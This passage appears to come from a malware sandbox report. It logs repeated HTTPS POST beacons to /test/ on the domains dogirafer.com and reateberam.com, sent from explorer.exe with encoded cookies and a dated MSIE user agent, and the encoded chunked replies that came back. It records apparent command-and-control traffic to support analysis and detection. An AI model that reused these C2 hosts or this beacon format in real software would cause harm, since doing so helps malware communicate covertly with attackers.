2024-12-02 17:41:51 UTC	793	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RM%2F1fwBHrrpO9d0En8R8nnsfTqZ9do12t%2FSqmlnwZVY9kujvHvk0bxTLv1vn%2F9U7%2BW9Lg4NbG%2B10xLoy7UnLm0zHndr5cG%2Bd5oD%2BeNer9C71%2FfybNO5aKWN1vQEITAK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c2e0be30f7c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1496&rtt_var=591&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1804697&cwnd=226&unsent_bytes=0&cid=b037e2c9098dcfff&ts=1637&x=0"
2024-12-02 17:41:51 UTC	339	IN	Data Raw: 31 34 63 0d 0a 50 43 75 64 52 4d 53 36 74 75 4a 6b 5a 52 33 62 67 6d 2b 73 78 6e 39 4a 50 30 6a 52 44 45 36 71 62 2f 69 30 76 43 66 4c 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 35 72 4c 6b 4d 76 63 70 4b 4f 69 31 67 6c 44 72 71 39 73 75 30 4c 73 35 53 74 70 63 6b 34 67 69 68 53 47 57 52 46 36 4d 62 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 73 7a 44 4f 76 6a 49 48 4d 58 5a 62 4c 49 65 48 63 76 71 34 4a 42 36 31 62 5a 43 6e 5a 42 68 30 34 34 4e 56 35 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6d 4f 66 46 58 52 5a Data Ascii: 14cPCudRMS6tuJkZR3bgm+sxn9JP0jRDE6qb/i0vCfLKRib7xuPoA21j4bUiz5rLkMvcpKOi1glDrq9su0Ls5Stpck4gihSGWRF6MbsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EsszDOvjIHMXZbLIeHcvq4JB61bZCnZBh044NV5EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbmOfFXRZ
2024-12-02 17:41:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49997	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:53 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:55 UTC	784	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWlUf1snB0htlxvPjiX3k4fuwYjpHCcbqiC4jH4ho3l4xckd%2BoLVW%2B3QJDYZEiQLs1UsK615KDj0V1dgUDptQeTT7UnsRKqp3EwfwlI5%2FKVkKg8EPEmWY3A0Gkzu2P5Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c42e8f24bd5-BUF alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=41712&min_rtt=39285&rtt_var=16465&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=74328&cwnd=32&unsent_bytes=0&cid=4d6a77a7eccced0b&ts=1762&x=0"
2024-12-02 17:41:55 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 53 6d 63 51 63 43 79 74 75 42 6a 61 68 72 51 68 53 72 6e 78 6e 46 47 50 45 72 53 61 79 65 71 61 2f 65 78 76 69 43 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 6a 42 71 49 55 55 70 63 2f 7a 6d 68 31 30 72 41 4c 71 33 2f 61 59 4c 74 35 47 76 6f 4d 31 52 37 79 64 54 48 6d 56 4b 36 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 45 4d 77 33 44 65 79 4d 4a 68 73 52 61 37 48 48 66 44 30 75 35 34 4e 46 36 31 4c 61 5a 78 78 47 68 55 77 37 4d 78 63 31 42 4f 6e 69 50 50 6a 56 45 48 69 59 50 6e 61 70 56 6a 65 4a 49 6c 38 58 4e 79 76 34 33 77 39 32 57 66 38 54 69 73 7a 5a 68 61 56 66 4d 34 33 6e 77 63 72 6d 4f 2f 56 58 51 35 Data Ascii: 14cOSmcQcCytuBjahrQhSrnxnFGPErSayeqa/exviCAWB/S4BKLswqykcfTtjBqIUUpc/zmh10rALq3/aYLt5GvoM1R7ydTHmVK6Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLEMw3DeyMJhsRa7HHfD0u54NF61LaZxxGhUw7Mxc1BOniPPjVEHiYPnapVjeJIl8XNyv43w92Wf8TiszZhaVfM43nwcrmO/VXQ5
2024-12-02 17:41:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50005	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:56 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:58 UTC	785	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WE0ZjIflQNtSQ0PrHPPoHZ9nlBdpS7zb%2BmT%2F4KUskNA2eIUXzDBZoZrnBtWVJR3o%2FlIZy81KaXX8zU26fsgyHAnIaqgDGmuZDZ9Nx9UBvuW9XARY%2BTK0ZTrbMcIaegAu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c564ecc5e65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1672&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1638608&cwnd=242&unsent_bytes=0&cid=926588a81977dee4&ts=1615&x=0"
2024-12-02 17:41:58 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 57 5a 52 4d 53 30 32 6f 70 6b 5a 68 33 59 67 32 58 69 67 33 4a 4f 4f 55 76 51 42 43 48 43 62 66 69 7a 74 79 66 4e 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 49 55 49 73 65 70 4c 6b 37 46 6b 71 41 4c 61 2f 75 4b 6c 47 74 5a 57 70 70 63 41 2b 37 6b 35 56 47 57 4e 4a 36 63 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 63 34 33 42 2b 72 71 4a 33 4d 55 5a 62 66 4a 63 33 4d 6b 71 34 5a 44 35 31 50 59 41 52 45 70 67 55 45 30 4e 56 34 4c 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 55 51 35 Data Ascii: 150MyWZRMS02opkZh3Yg2Xig3JOOUvQBCHCbfiztyfNZ2mcphSGpB6yiJiVjA1sIUIsepLk7FkqALa/uKlGtZWppcA+7k5VGWNJ6cHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Ec43B+rqJ3MUZbfJc3Mkq4ZD51PYAREpgUE0NV4LOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9UQ5
2024-12-02 17:41:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50013	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:59 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:01 UTC	783	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7naEAW9ozF1tR%2BXPr3f611MfIW2A88R3%2BeuzK6Jg8RWldXCn2CqbX9%2Fp0c8LUEeiPxIqUmMDExNKzaiPO479js43oRCbZuCWG9oWVqW12ysgdiCSN1x0vMNfcfN8Fov"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c689ff01a2c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1834&min_rtt=1830&rtt_var=695&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1565683&cwnd=174&unsent_bytes=0&cid=58f8b830e4c5a697&ts=1625&x=0"
2024-12-02 17:42:01 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 53 57 61 51 63 61 37 32 6f 70 76 5a 78 6a 51 68 57 37 6e 67 33 39 4a 4f 55 50 65 42 30 36 71 61 76 79 33 75 69 2f 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6e 4a 45 51 69 66 70 75 4f 69 31 67 6d 43 72 4f 32 73 65 30 4a 73 4a 65 72 72 63 73 2b 67 69 64 53 48 32 52 50 37 38 4c 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 38 30 35 42 4f 76 6e 4a 48 4d 55 61 62 4c 48 63 6e 67 71 71 34 56 50 37 56 58 64 43 52 30 70 67 45 38 35 4d 46 30 50 4e 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 42 55 51 5a Data Ascii: 150PSWaQca72opvZxjQhW7ng39JOUPeB06qavy3ui/OKRib7xuPoA21j4bUizRnJEQifpuOi1gmCrO2se0JsJerrcs+gidSH2RP78LsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4G805BOvnJHMUabLHcngqq4VP7VXdCR0pgE85MF0PN8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBUQZ
2024-12-02 17:42:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50020	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:02 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:04 UTC	783	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyNBgo748cpq2jTA20wElW0p8oJU%2BqGU170XF0wqAiTZl541JBXxkH1TBq2bBoM4xk%2Br2CGAtP3H6dHglH1bHfoY1fMd6eVbqgV9KS8ZhqFJJaKj3x0CAO3MP8e%2BTJ6D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c7b1db2de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1488&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1904761&cwnd=230&unsent_bytes=0&cid=72c26ecfd12d0da3&ts=1601&x=0"
2024-12-02 17:42:04 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 75 66 52 4d 53 31 32 59 70 76 59 42 6a 65 68 57 66 6c 67 33 52 4b 50 45 50 51 41 43 44 43 61 66 36 77 76 43 4c 49 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6f 49 6b 49 76 63 35 54 6a 37 46 73 6a 44 4c 53 33 74 61 56 47 75 70 47 73 6f 63 45 38 37 55 35 51 47 32 46 4e 37 4d 61 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 30 33 44 65 76 6b 49 68 6c 2b 61 72 4c 42 66 58 6b 76 34 73 74 42 36 46 66 63 43 78 70 50 37 45 45 2f 4d 56 6b 42 50 34 6e 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 51 52 4a Data Ascii: 150MiufRMS12YpvYBjehWflg3RKPEPQACDCaf6wvCLIYmmcphSGpB6yiJiVjA1oIkIvc5Tj7FsjDLS3taVGupGsocE87U5QG2FN7MajfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc03DevkIhl+arLBfXkv4stB6FfcCxpP7EE/MVkBP4nMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1QRJ
2024-12-02 17:42:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50027	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:05 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:06 UTC	779	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BX4uaoiTQmXbjFLKxjisJktaKlvtHMBrlVPyVHE5AIVVBdUr8hwMtT35sbGD3uTHky6MZtWumfoYYa1knYTgkr9N%2FQXhAjQ1eybn4LwwWlAQO9xQtEqRjW24qPzZwoRG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c8dce840f60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1510&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1909744&cwnd=211&unsent_bytes=0&cid=f022a7e58fbcb1fb&ts=1422&x=0"
2024-12-02 17:42:06 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 71 62 51 4d 4b 31 32 59 70 76 5a 78 6a 5a 6a 47 62 6b 67 33 4a 48 4f 30 4c 55 41 45 36 71 61 2f 2b 36 76 69 58 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 76 4c 6b 38 69 65 35 43 4f 67 46 34 71 43 4c 4b 32 75 4f 30 49 73 5a 4f 70 6f 38 6f 37 67 69 42 57 47 57 64 4c 36 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 48 47 73 73 33 44 65 76 72 54 68 73 58 62 72 58 43 63 6e 4a 68 35 6f 52 50 36 56 48 62 41 48 5a 50 67 6b 38 37 4f 46 6f 4b 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 5a 57 51 5a Data Ascii: 150PyqbQMK12YpvZxjZjGbkg3JHO0LUAE6qa/+6viXJKRib7xuPoA21j4bUizRvLk8ie5COgF4qCLK2uO0IsZOpo8o7giBWGWdL6Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzHGss3DevrThsXbrXCcnJh5oRP6VHbAHZPgk87OFoKcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/ZWQZ
2024-12-02 17:42:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50032	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:08 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50033	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:10 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:11 UTC	791	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XKKEM1mDlnvB6KtDkzcLkh8cWdk2r7ncE17FI%2FHXw9Qgm76uKL3KgBZgCYS3Heiis2V8dC9Kruqy%2BTDEQE0cJm84IIsUWucptK4SFumbzE3Jqkgzf3ewkQ%2BVmu16dXcPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1cafaa7436b4-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13966&min_rtt=13960&rtt_var=5248&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=208377&cwnd=32&unsent_bytes=0&cid=08a2df0f6be5293b&ts=698&x=0"
2024-12-02 17:42:11 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 69 75 55 51 4d 47 33 33 49 70 6b 5a 68 33 65 67 32 48 6d 67 33 52 49 50 6b 37 53 44 43 6e 43 61 66 36 30 75 43 50 4d 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 49 55 45 74 63 35 4c 67 37 46 63 6d 41 62 75 34 73 61 52 47 75 70 53 71 6f 38 77 33 37 55 35 58 48 47 64 4e 36 73 65 6b 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 30 34 42 75 7a 67 4b 42 56 2b 62 37 48 44 65 6e 55 72 35 63 74 50 35 6c 48 59 43 42 42 47 37 45 67 2f 4e 6c 6f 4b 4e 6f 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 51 54 70 Data Ascii: 150MiuUQMG33IpkZh3eg2Hmg3RIPk7SDCnCaf60uCPMZmmcphSGpB6yiJiVjA1tIUEtc5Lg7FcmAbu4saRGupSqo8w37U5XHGdN6sekfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc04BuzgKBV+b7HDenUr5ctP5lHYCBBG7Eg/NloKNorMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1QTp
2024-12-02 17:42:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50034	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:42:12 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:42:13 UTC	792	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cc0uZEI%2F01EhAE3kIQOJFjmbsxUBu8tAbb6OHyRRCCcup%2FvgTDVw1mL9dzmEVyLrDTHDziim%2FD8MPfAFIoaODqNhAEAGz4zU72qPuLiAfWRVJEBIySdAq8z7X9l3cLY%2Bsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1cbb886d18c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1509&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1826141&cwnd=148&unsent_bytes=0&cid=a7849ac9f211f286&ts=740&x=0"
2024-12-02 17:42:13 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 53 69 64 51 4d 53 33 32 49 70 69 5a 52 76 61 68 32 44 67 67 33 4a 50 4f 45 6a 65 42 79 4c 43 62 76 2b 79 76 53 58 4f 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 4c 6b 51 75 66 5a 44 70 37 46 73 6b 44 72 71 32 75 61 46 47 73 4a 53 6d 70 38 73 32 35 55 35 57 47 32 46 4c 37 63 53 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 41 30 42 2b 6a 6b 49 78 39 2b 62 62 37 44 66 58 41 6b 34 63 74 48 36 56 54 59 44 42 70 41 37 45 34 35 4d 6c 30 4b 50 34 6a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 53 51 35 Data Ascii: 150OSidQMS32IpiZRvah2Dgg3JPOEjeByLCbv+yvSXOZGmcphSGpB6yiJiVjA1tLkQufZDp7FskDrq2uaFGsJSmp8s25U5WG2FL7cSmfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA0B+jkIx9+bb7DfXAk4ctH6VTYDBpA7E45Ml0KP4jMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SQ5
2024-12-02 17:42:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50035	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
